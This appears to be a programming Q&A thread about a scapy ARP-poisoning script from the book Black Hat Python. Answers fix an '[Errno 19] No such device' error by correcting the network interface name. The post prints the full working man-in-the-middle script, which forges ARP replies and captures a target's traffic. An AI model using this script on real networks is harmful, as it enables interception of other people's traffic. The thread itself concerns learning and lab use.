# Arper.py from Black Hat Python Book [Errno 19]

Tags: python, linux, python-2.7, sockets, scapy

So in the book it teaches how to make ARP poisoning script where we switch the gateway of a target machine to our own machine so it cant access the Internet without first reporting to the attacking computer. The code looks like this

```
    from scapy.all import *
import os
import sys
import threading

interface    = "en1"
target_ip    = "192.168.1.2"
gateway_ip   = "192.168.1.1"
packet_count = 1000
poisoning    = True

def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):

    # slightly different method using send
    print "[*] Restoring target..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)

def get_mac(ip_address):

    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)

    # return the MAC address from a response
    for s,r in responses:
        return r[Ether].src

    return None

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    global poisoning

    poison_target = ARP()
    poison_target.op   = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst= target_mac

    poison_gateway = ARP()
    poison_gateway.op   = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst= gateway_mac

    print "[*] Beginning the ARP poison. [CTRL-C to stop]"

    while poisoning:
        send(poison_target)
        send(poison_gateway)

        time.sleep(2)

    print "[*] ARP poison attack finished."

    return

# set our interface
conf.iface = interface

# turn off output
conf.verb  = 0

print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)

# start poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count

    bpf_filter  = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)

except KeyboardInterrupt:
    pass

finally:
    # write out the captured packets
    print "[*] Writing packets to arper.pcap"
    wrpcap('arper.pcap',packets)

    poisoning = False

    # wait for poisoning thread to exit
    time.sleep(2)

    # restore the network
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)
```

So when I execute the script in my linux terminal it turns up an error with the following lines:

```
 line 64, in <module>
gateway_mac = get_mac(gateway_ip)
```

and

```
line 21, in get_mac
responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
```

and Turns this error:

```
socket.error: [Errno 19] No such device
```

Entire Error Log:

```
    Traceback (most recent call last):
  File "/root/Desktop/BHP-Code/Chapter4/arper.py", line 64, in <module>
    gateway_mac = get_mac(gateway_ip)
  File "/root/Desktop/BHP-Code/Chapter4/arper.py", line 21, in get_mac
    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
  File "/usr/lib/python2.7/dist-packages/scapy/sendrecv.py", line 357, in srp
    s = conf.L2socket(iface=iface, filter=filter, nofilter=nofilter, type=type)
  File "/usr/lib/python2.7/dist-packages/scapy/arch/linux.py", line 417, in __init__
    self.ins.bind((iface, type))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 19] No such device
```

Comment: Dis you ever get this working? I'm having the same issue.

Comment: This is pretty late, but I fixed the problem by setting `interface = "Wi-Fi"`

Answer (score 1, accepted):

You have to edit the variables at the beginning of the script:

```
interface    = "en1"
target_ip    = "192.168.1.2"
gateway_ip   = "192.168.1.1"
packet_count = 1000
poisoning    = True
```

Here, it seems that the value of `interface` does not match your config, but you probably also want to adjust `target_ip` and `gateway_ip`.

Comment: Do you have any other ideas on this?  My ip and default gateway are correct.  I am attacking a windows 7 vm from a kali vm.  I am able to ping the windows machine form the kali machine and vice versa.  I still cannot resolve this issue.

Answer (score 1):

On Kali, when you do an `ifconfig` you got your interface name that has an IP address assigned. Pick that interface name and edit your interface with the exact same name. Otherwise it won't find the interface and the code will not work for your attack.

Answer (score 0):

It is a problem with the interface.  I was having the same problem and notice that I was able to get the the mac address from the python interpreter.

```
>>>import arper
>>>gateway_mac = arper.get_mac('192.168.1.254')
Begin emission:
Finished to send 1 packets
*
Received 1 packets, got 1 answers, remaining 0 packets
>>>
```

The error did not occur. Unfortunetly I don't have the knowledge to explain why. I do know that changing the interface is what was causing the problems. Should be able to fix it by commenting out the interface or changing to wlan0

Answer (score 0):

change in interface="eth0" worked for me